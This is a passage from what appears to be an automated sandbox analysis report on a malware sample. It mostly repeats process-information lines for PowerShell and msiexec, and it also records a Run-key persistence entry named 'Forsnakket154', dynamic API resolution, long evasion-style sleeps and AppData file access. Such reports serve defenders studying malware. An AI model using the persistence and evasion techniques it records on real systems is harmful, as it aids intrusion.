'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebui
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Forsnakket154Jump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Forsnakket154Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_004047CB
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5530Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4412Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7330Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2350Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6952Thread sleep count: 3797 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep count: 797 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep time: -2391000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep count: 5168 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4876Thread sleep time: -15504000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3797 delay: -5Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_21BD10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD6580 FindFirstFileExA,9_2_21BD6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
